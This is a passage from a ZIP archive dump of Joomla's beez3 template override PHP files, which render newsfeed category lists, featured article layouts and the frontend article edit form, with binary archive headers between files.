	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(NewsfeedsHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>
		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_newsfeeds.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_items_cat') == 1) : ?>
			<dl class="newsfeed-count"><dt>
				<?php echo JText::_('COM_NEWSFEEDS_CAT_NUM'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK՜�\�a�AA/beez3/html/com_newsfeeds/categories/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
	<h1>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
	<?php endif; ?>

		<?php if ($this->params->get('show_base_description')) : ?>
		<?php // If there is a description in the menu parameters use that. ?>
			<?php if ($this->params->get('categories_description')) : ?>
				<div class="category-desc base-desc">
					<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_newsfeeds.categories'); ?>
				</div>
			<?php else : ?>
				<?php // Otherwise get one from the database if it exists. ?>
				<?php if ($this->parent->description) : ?>
					<div class="category-desc base-desc">
						<?php echo JHtml::_('content.prepare', $this->parent->description, '', 'com_newsfeeds.categories'); ?>
					</div>
				<?php endif; ?>
			<?php endif; ?>
		<?php endif; ?>
	<?php echo $this->loadTemplate('items'); ?>
</div>
PK՜�\~����6beez3/html/com_newsfeeds/category/default_children.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(NewsfeedsHelperRoute::getCategoryRoute($child->id));?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) : ?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_newsfeeds.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_items') == 1) : ?>
				<dl class="newsfeed-count"><dt>
					<?php echo JText::_('COM_NEWSFEEDS_CAT_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
			<?php endif; ?>

			<?php if (count($child->getChildren()) > 0) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK՜�\��2��3beez3/html/com_newsfeeds/category/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework');

$n         = count($this->items);
$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));
?>

<?php if (empty($this->items)) : ?>
	<p><?php echo JText::_('COM_NEWSFEEDS_NO_ARTICLES'); ?></p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString(), ENT_COMPAT, 'UTF-8'); ?>" method="post" name="adminForm" id="adminForm">
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	<?php endif; ?>
	<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
	<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
	</fieldset>
	<table class="category">
		<?php if ($this->params->get('show_headings') == 1) : ?>
		<thead><tr>
				<th class="item-title" id="tableOrdering">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_FEED_NAME', 'a.name', $listDirn, $listOrder); ?>
				</th>

				<?php if ($this->params->get('show_articles')) : ?>
				<th class="item-num-art" id="tableOrdering2">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_NUM_ARTICLES', 'a.numarticles', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('show_link')) : ?>
				<th class="item-link" id="tableOrdering3">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_FEED_LINK', 'a.link', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

			</tr>
		</thead>
		<?php endif; ?>

		<tbody>
			<?php foreach ($this->items as $i => $item) : ?>
				<?php if ($this->items[$i]->published == 0) : ?>
					<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
				<?php else: ?>
					<tr class="cat-list-row<?php echo $i % 2; ?>" >
				<?php endif; ?>

				<td class="item-title">
					<a href="<?php echo JRoute::_(NewsFeedsHelperRoute::getNewsfeedRoute($item->slug, $item->catid)); ?>">
						<?php echo $item->name; ?></a>
				</td>

				<?php if ($this->params->get('show_articles')) : ?>
					<td class="item-num-art">
						<?php echo $item->numarticles; ?>
					</td>
				<?php  endif; ?>

				<?php if ($this->params->get('show_link')) : ?>
					<td class="item-link">
						<a href="<?php echo $item->link; ?>"><?php echo $item->link; ?></a>
					</td>
				<?php endif; ?>

					</tr>

			<?php endforeach; ?>

		</tbody>
	</table>

	<?php if ($this->params->get('show_pagination')) : ?>
		<div class="pagination">
		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
		</div>
	<?php endif; ?>

</form>
<?php endif; ?>
PK՜�\Q�{Fgg-beez3/html/com_newsfeeds/category/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="newsfeed-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_newsfeeds.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_newsfeeds.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php echo $this->loadTemplate('items'); ?>

<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
</div>
<?php endif; ?>
</div>
PK՜�\{��
��0beez3/html/com_content/featured/default_item.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$canEdit = $this->item->params->get('access-edit');
$params  = &$this->item->params;

$showPrintIcon = $params->get('show_print_icon');
$showEmailIcon = $params->get('show_email_icon');

$images         = json_decode($this->item->images);
$app            = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

$currentDate   = JFactory::getDate()->format('Y-m-d H:i:s');
$isUnpublished = ($this->item->state == 0 || $this->item->publish_up > $currentDate)
	|| ($this->item->publish_down < $currentDate && $this->item->publish_down !== JFactory::getDbo()->getNullDate());

?>
<?php if ($isUnpublished) : ?>
	<div class="system-unpublished">
<?php endif; ?>
<?php if ($params->get('show_title')) : ?>
	<h2>
		<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
			<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)); ?>">
			<?php echo $this->escape($this->item->title); ?></a>
		<?php else : ?>
			<?php echo $this->escape($this->item->title); ?>
		<?php endif; ?>
	</h2>
<?php endif; ?>

<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
<div class="pull-left"><?php echo $this->item->event->afterDisplayTitle; ?></div>

<?php if ($canEdit || $showPrintIcon || $showEmailIcon) : ?>
	<ul class="actions">
		<?php if ($showPrintIcon) : ?>
		<li class="print-icon">
			<?php echo JHtml::_('icon.print_popup', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
		<?php if ($showEmailIcon) : ?>
		<li class="email-icon">
			<?php echo JHtml::_('icon.email', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>

		<?php if ($canEdit) : ?>
		<li class="edit-icon">
			<?php echo JHtml::_('icon.edit', $this->item, $params, array(), true); ?>
		</li>
		<?php endif; ?>
	</ul>
<?php endif; ?>

<?php echo $this->item->event->beforeDisplayContent; ?>

<?php // to do not that elegant would be nice to group the params ?>

<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_parent_category') or $params->get('show_hits')) : ?>
 <dl class="article-info">
 <dt class="article-info-term"><?php  echo JText::_('COM_CONTENT_ARTICLE_INFO'); ?></dt>
<?php endif; ?>
<?php if ($this->item->parent_id != 1 && $params->get('show_parent_category')) : ?>
		<dd class="parent-category-name">
			<?php $title = $this->escape($this->item->parent_title);
				$title = $title ?: JText::_('JGLOBAL_UNCATEGORISED');
				$url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->parent_slug)) . '">' . $title . '</a>'; ?>
			<?php if ($params->get('link_parent_category') and $this->item->parent_slug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_PARENT', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_category')) : ?>
		<dd class="category-name">
			<?php 	$title = $this->escape($this->item->category_title);
					$title = $title ?: JText::_('JGLOBAL_UNCATEGORISED');
					$url = '<a href="'.JRoute::_(ContentHelperRoute::getCategoryRoute($this->item->catslug)).'">'.$title.'</a>';?>
			<?php if ($params->get('link_category') and $this->item->catslug) : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $url); ?>
				<?php else : ?>
				<?php echo JText::sprintf('COM_CONTENT_CATEGORY', $title); ?>
			<?php endif; ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_create_date')) : ?>
		<dd class="create">
		<?php echo JText::sprintf('COM_CONTENT_CREATED_DATE_ON', JHtml::_('date', $this->item->created, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_modify_date')) : ?>
		<dd class="modified">
		<?php echo JText::sprintf('COM_CONTENT_LAST_UPDATED', JHtml::_('date', $this->item->modified, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_publish_date')) : ?>
		<dd class="published">
		<?php echo JText::sprintf('COM_CONTENT_PUBLISHED_DATE_ON', JHtml::_('date', $this->item->publish_up, JText::_('DATE_FORMAT_LC2'))); ?>
		</dd>
<?php endif; ?>
<?php if (!empty($this->item->author) && $params->get('show_author')) : ?>
	<dd class="createdby">
		<?php $author = $this->item->created_by_alias ?: $this->item->author; ?>
		<?php if (!empty($this->item->contact_link ) &&  $params->get('link_author') == true) : ?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $this->item->contact_link, $author)); ?>
		<?php else :?>
			<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
		<?php endif; ?>
	</dd>
<?php endif; ?>
<?php if ($params->get('show_hits')) : ?>
		<dd class="hits">
		<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', $this->item->hits); ?>
		</dd>
<?php endif; ?>
<?php if ($params->get('show_author') or $params->get('show_category') or $params->get('show_create_date') or $params->get('show_modify_date') or $params->get('show_publish_date') or $params->get('show_parent_category') or $params->get('show_hits')) : ?>
 </dl>
<?php endif; ?>

<?php  if (isset($images->image_intro) and !empty($images->image_intro)) : ?>
	<?php $imgfloat = empty($images->float_intro) ? $params->get('float_intro') : $images->float_intro; ?>
	<div class="img-intro-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>">
	<img
		<?php if ($images->image_intro_caption):
			echo 'class="caption"'.' title="' . htmlspecialchars($images->image_intro_caption, ENT_COMPAT, 'UTF-8') .'"';
		endif; ?>
		src="<?php echo htmlspecialchars($images->image_intro, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt, ENT_COMPAT, 'UTF-8'); ?>"/>
	</div>
<?php endif; ?>

<?php echo $this->item->introtext; ?>

<?php if ($this->item->readmore && $params->get('show_readmore')) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
	endif;
?>
		<p class="readmore">
				<a href="<?php echo $link; ?>">
					<?php if (!$params->get('access-view')) :
						echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
					elseif ($readmore = $this->item->alternative_readmore) :
						echo $readmore;
						if ($params->get('show_readmore_title', 0) != 0) :
							echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
						endif;
					elseif ($params->get('show_readmore_title', 0) == 0) :
						echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
					else :
						echo JText::_('COM_CONTENT_READ_MORE');
						echo JHtml::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
					endif; ?></a>
		</p>
<?php endif; ?>

<?php if ($isUnpublished) : ?>
	</div>
<?php endif; ?>

<div class="item-separator"></div>
<?php echo $this->item->event->afterDisplayContent; ?>
PK՜�\1�iNN1beez3/html/com_content/featured/default_links.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>

<h3><?php echo JText::_('COM_CONTENT_MORE_ARTICLES'); ?></h3>

<ol class="links">
<?php foreach ($this->link_items as &$item) : ?>
	<li>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>">
			<?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>

PK՜�\wV�	�	+beez3/html/com_content/featured/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');

?>

<section class="blog-featured<?php echo $this->pageclass_sfx;?>">
<?php if ( $this->params->get('show_page_heading') != 0) : ?>
	<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
<?php endif; ?>
<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php
			$leadingcount++;
		?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php
	$introcount = count($this->intro_items);
	$counter = 0;
?>
<?php if (!empty($this->intro_items)) : ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>

	<?php
		$key = ($key - $leadingcount) + 1;
		$rowcount = (((int) $key - 1) % (int) $this->columns) + 1;
		$row = $counter / $this->columns;

		if ($rowcount === 1) : ?>

			<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-'.$row; ?>">
		<?php endif; ?>
		<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished"' : null; ?>">
			<?php
					$this->item = &$item;
					echo $this->loadTemplate('item');
			?>
		</article>
		<?php $counter++; ?>
			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>
				<span class="row-separator"></span>
				</div>

			<?php endif; ?>
	<?php endforeach; ?>
<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<div class="items-more">
	<?php echo $this->loadTemplate('links'); ?>
	</div>
<?php endif; ?>

<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>
</section>


PK՜�\'��,�,$beez3/html/com_content/form/edit.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

// Create shortcut to parameters.
$params = $this->state->get('params');
//$images = json_decode($this->item->images);
//$urls = json_decode($this->item->urls);

// This checks if the editor config options have ever been saved. If they haven't they will fall back to the original settings.
$editoroptions = isset($params->show_publishing_options);
if (!$editoroptions):
	$params->show_urls_images_frontend = '0';
endif;

$ignoredFieldsets = array('image-intro', 'image-full', 'jmetadata', 'item_associations');

?>

<script type="text/javascript">
	Joomla.submitbutton = function(task)
	{
		if (task === 'article.cancel' || document.formvalidator.isValid(document.getElementById('adminForm')))
		{
			<?php echo $this->form->getField('articletext')->save(); ?>
			Joomla.submitform(task);
		}
	}
</script>
<div class="edit item-page<?php echo $this->pageclass_sfx; ?>">
<?php if ($params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<form action="<?php echo JRoute::_('index.php?option=com_content&a_id='.(int) $this->item->id); ?>" method="post" name="adminForm" id="adminForm" class="form-validate">
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_ARTICLE_CONTENT'); ?></legend>

			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('title'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('title'); ?>
				</div>
			</div>

		<?php if ($this->item->id === null):?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('alias'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('alias'); ?>
				</div>
			</div>
		<?php endif; ?>

			<div class="btn-group">
				<button type="button" class="btn btn-primary" onclick="Joomla.submitbutton('article.save')">
					<?php echo JText::_('JSAVE') ?>
				</button>
				<button type="button" class="btn" onclick="Joomla.submitbutton('article.cancel')">
					<?php echo JText::_('JCANCEL') ?>
				</button>
			</div>
			<?php if ($this->captchaEnabled) : ?>
				<?php echo $this->form->renderField('captcha'); ?>
			<?php endif; ?>
			<?php echo $this->form->getInput('articletext'); ?>

	</fieldset>
	<?php if ($params->get('show_urls_images_frontend')  ) : ?>
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_IMAGES_AND_URLS'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro', 'images'); ?>
					<?php echo $this->form->getInput('image_intro', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro_alt', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_intro_alt', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_intro_caption', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_intro_caption', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('float_intro', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('float_intro', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext_alt', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext_alt', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('image_fulltext_caption', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('image_fulltext_caption', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('float_fulltext', 'images'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('float_fulltext', 'images'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urla', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urla', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlatext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlatext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targeta', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlb', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlb', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlbtext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlbtext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targetb', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlc', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlc', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('urlctext', 'urls'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('urlctext', 'urls'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="controls">
					<?php echo $this->form->getInput('targetc', 'urls'); ?>
				</div>
			</div>
	</fieldset>
	<?php endif; ?>

	<?php // Render additional fieldsets added by plugins. ?>
	<?php foreach ($this->form->getFieldsets() as $fieldset) : ?>
		<?php if (in_array($fieldset->name, $ignoredFieldsets)) : ?>
			<?php continue; ?>
		<?php endif; ?>
		<fieldset>
			<legend><?php echo JText::_($fieldset->label); ?></legend>
			<?php $this->fieldset = $fieldset->name; ?>
			<?php echo JLayoutHelper::render('joomla.edit.fieldset', $this); ?>
		</fieldset>
	<?php endforeach; ?>

	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_PUBLISHING'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('catid'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('catid'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('tags'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('tags'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('note'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('note'); ?>
				</div>
			</div>
			<?php if ($params->get('save_history', 0)) : ?>
				<div class="control-label">
					<?php echo $this->form->getLabel('version_note'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('version_note'); ?>
				</div>
			<?php endif; ?>
			<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('created_by_alias'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('created_by_alias'); ?>
				</div>
			</div>
			<?php endif; ?>
			<?php if ($this->item->params->get('access-change')) : ?>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('state'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('state'); ?>
					</div>
				</div>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('featured'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('featured'); ?>
					</div>
				</div>
				<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('publish_up'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('publish_up'); ?>
					</div>
				</div>
				<div class="control-group">
					<div class="control-label">
						<?php echo $this->form->getLabel('publish_down'); ?>
					</div>
					<div class="controls">
						<?php echo $this->form->getInput('publish_down'); ?>
					</div>
				</div>
				<?php endif; ?>
			<?php endif; ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('access'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('access'); ?>
				</div>
			</div>
			<?php if ($this->item->id === null):?>
				<div class="control-group">
					<div class="control-label">
					</div>
					<div class="controls">
						<?php echo JText::_('COM_CONTENT_ORDERING'); ?>
					</div>
				</div>
			<?php endif; ?>
	</fieldset>

	<fieldset>
		<legend><?php echo JText::_('JFIELD_LANGUAGE_LABEL'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('language'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('language'); ?>
				</div>
			</div>
	</fieldset>

	<?php if ($params->get('show_publishing_options', 1) == 1) : ?>
	<fieldset>
		<legend><?php echo JText::_('COM_CONTENT_METADATA'); ?></legend>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('metadesc'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('metadesc'); ?>
				</div>
			</div>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('metakey'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('metakey'); ?>
				</div>
			</div>
	</fieldset>
	<?php endif; ?>
		<input type="hidden" name="task" value="" />
		<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
		<?php if ($this->params->get('enable_category', 0) == 1) : ?>
			<input type="hidden" name="jform[catid]" value="<?php echo $this->params->get('catid', 1);?>"/>
		<?php endif;?>
		<?php echo JHtml::_('form.token'); ?>

</form>
</div>
PK՜�\v.��*beez3/html/com_content/archive/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.beez5
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app = JFactory::getApplication();
$templateparams = $app->getTemplate(true)->params;

if (!$templateparams->get('html5', 0))
{
	require JPATH_BASE.'/components/com_content/views/archive/tmpl/default.php';
